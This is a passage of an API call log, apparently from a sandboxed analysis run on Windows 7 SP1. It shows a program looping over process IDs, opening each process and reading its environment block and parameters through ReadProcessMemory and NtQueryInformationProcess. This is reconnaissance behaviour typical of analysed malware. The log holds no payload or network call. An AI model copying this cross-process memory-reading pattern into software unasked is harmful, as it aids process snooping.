[0405.542] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x421ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0405.542] malloc (_Size=0x70) returned 0x2c4740
[0405.542] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x42275c, lpBuffer=0x2c4740, nSize=0x6e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c4740*, lpNumberOfBytesRead=0x0) returned 1
[0405.543] free (_Block=0x2c4740)
[0405.544] CloseHandle (hObject=0x240) returned 1
[0405.545] _ui64tow (_Value=0xacc, _Buffer="2756", _Radix=10) returned="2764"
[0405.550] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2764") returned 4
[0405.552] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0405.552] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0405.575] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xacc) returned 0x240
[0405.575] GetLastError () returned 0x0
[0405.575] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0405.575] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.576] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0405.576] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0xb2920, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.576] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0xb26e8, lpBuffer=0x12dd100, nSize=0x6c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0405.577] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0405.578] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0405.578] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.579] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0xb1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0405.579] malloc (_Size=0x74) returned 0x2c4740
[0405.579] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0xb2754, lpBuffer=0x2c4740, nSize=0x72, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c4740*, lpNumberOfBytesRead=0x0) returned 1
[0405.579] free (_Block=0x2c4740)
[0405.580] CloseHandle (hObject=0x240) returned 1
[0405.581] _ui64tow (_Value=0xad4, _Buffer="2764", _Radix=10) returned="2772"
[0405.586] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2772") returned 4
[0405.587] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0405.587] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0405.613] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xad4) returned 0x240
[0405.613] GetLastError () returned 0x0
[0405.613] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0405.614] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.614] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0405.614] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x252910, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.614] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x2526e4, lpBuffer=0x12dd100, nSize=0x66, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0405.615] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0405.616] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0405.616] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.616] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x251ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0405.617] malloc (_Size=0x6e) returned 0x2c4740
[0405.617] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x25274a, lpBuffer=0x2c4740, nSize=0x6c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c4740*, lpNumberOfBytesRead=0x0) returned 1
[0405.617] free (_Block=0x2c4740)
[0405.618] CloseHandle (hObject=0x240) returned 1
[0405.619] _ui64tow (_Value=0xadc, _Buffer="2772", _Radix=10) returned="2780"
[0405.623] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2780") returned 4
[0405.624] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0405.625] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0405.681] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xadc) returned 0x240
[0405.681] GetLastError () returned 0x0
[0405.681] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0405.682] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.695] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0405.695] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x3528e0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.696] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x3526e0, lpBuffer=0x12dd100, nSize=0x56, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0405.699] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0405.700] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0405.700] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.701] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x351ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0405.701] malloc (_Size=0x5e) returned 0x2c0790
[0405.701] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x352736, lpBuffer=0x2c0790, nSize=0x5c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c0790*, lpNumberOfBytesRead=0x0) returned 1
[0405.701] free (_Block=0x2c0790)
[0405.702] CloseHandle (hObject=0x240) returned 1
[0405.741] _ui64tow (_Value=0xab0, _Buffer="2780", _Radix=10) returned="2736"
[0405.746] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2736") returned 4
[0405.747] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x232, dwBuildNumber=0x0, dwPlatformId=0x128260, szCSDVersion="") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0405.747] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0405.781] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xab0) returned 0x240
[0405.781] GetLastError () returned 0x0
[0405.781] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0405.781] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.782] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0405.782] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4b2930, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.782] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4b26fa, lpBuffer=0x12dd100, nSize=0x6c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0405.783] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0405.785] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0405.785] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.785] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4b1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0405.785] malloc (_Size=0x74) returned 0x2c4740
[0405.785] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4b2766, lpBuffer=0x2c4740, nSize=0x72, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c4740*, lpNumberOfBytesRead=0x0) returned 1
[0405.786] free (_Block=0x2c4740)
[0405.786] CloseHandle (hObject=0x240) returned 1
[0405.787] _ui64tow (_Value=0xcb4, _Buffer="2736", _Radix=10) returned="3252"
[0405.792] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="3252") returned 4
[0405.793] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1243f4, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0405.793] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0405.868] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xcb4) returned 0x0
[0405.868] CloseHandle (hObject=0x0) returned 0
[0405.869] _ui64tow (_Value=0xe78, _Buffer="3252", _Radix=10) returned="3704"
[0405.874] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="3704") returned 4
[0405.875] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0405.875] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0405.896] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xe78) returned 0x0
[0405.896] CloseHandle (hObject=0x0) returned 0
[0405.897] _ui64tow (_Value=0xf00, _Buffer="3704", _Radix=10) returned="3840"
[0405.902] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="3840") returned 4
[0405.903] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0405.903] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0405.933] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xf00) returned 0x0
[0405.933] CloseHandle (hObject=0x0) returned 0
[0405.934] _ui64tow (_Value=0xb60, _Buffer="3840", _Radix=10) returned="2912"
[0405.938] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2912") returned 4
[0405.939] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0405.939] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0405.961] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb60) returned 0x0
[0405.961] CloseHandle (hObject=0x0) returned 0
[0405.962] _ui64tow (_Value=0x384, _Buffer="2912", _Radix=10) returned="900"
[0405.966] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="900") returned 3
[0405.967] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0405.968] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0406.016] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x384) returned 0x240
[0406.017] GetLastError () returned 0x0
[0406.017] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0406.017] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7fffffdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0406.017] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0406.017] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x1c28b0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0406.018] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x1c2688, lpBuffer=0x12dd100, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0406.019] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0406.020] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0406.020] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7fffffdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0406.020] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x1c1e60, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0406.021] malloc (_Size=0x116) returned 0x2c4740
[0406.021] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x1c26c8, lpBuffer=0x2c4740, nSize=0x114, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c4740*, lpNumberOfBytesRead=0x0) returned 1
[0406.021] free (_Block=0x2c4740)
[0406.022] CloseHandle (hObject=0x240) returned 1
[0406.023] _ui64tow (_Value=0x424, _Buffer="900", _Radix=10) returned="1060"
[0406.030] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="1060") returned 4
[0406.031] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0406.031] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0406.053] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x424) returned 0x240
[0406.054] GetLastError () returned 0x0
[0406.054] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0406.054] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7fffffdc018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0406.054] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0406.054] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x1f2850, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0406.054] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x1f26c8, lpBuffer=0x12dd100, nSize=0x42, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0406.055] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0406.057] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0406.057] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7fffffdc020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0406.057] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x1f1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0406.057] malloc (_Size=0x80) returned 0x2e3a70
[0406.057] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x1f270a, lpBuffer=0x2e3a70, nSize=0x7e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2e3a70*, lpNumberOfBytesRead=0x0) returned 1
[0406.058] free (_Block=0x2e3a70)
[0406.058] CloseHandle (hObject=0x240) returned 1
[0406.059] _ui64tow (_Value=0xd68, _Buffer="1060", _Radix=10) returned="3432"
[0406.064] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="3432") returned 4
[0406.066] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0406.066] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0406.088] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xd68) returned 0x0
[0406.089] CloseHandle (hObject=0x0) returned 0
[0406.094] _ui64tow (_Value=0x6a8, _Buffer="3432", _Radix=10) returned="1704"
[0406.099] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="1704") returned 4
[0406.100] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1243f4, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0406.100] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0406.139] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x6a8) returned 0x0
[0406.139] CloseHandle (hObject=0x0) returned 0
[0406.140] _ui64tow (_Value=0x8d0, _Buffer="1704", _Radix=10) returned="2256"
[0406.148] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2256") returned 4
[0406.150] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
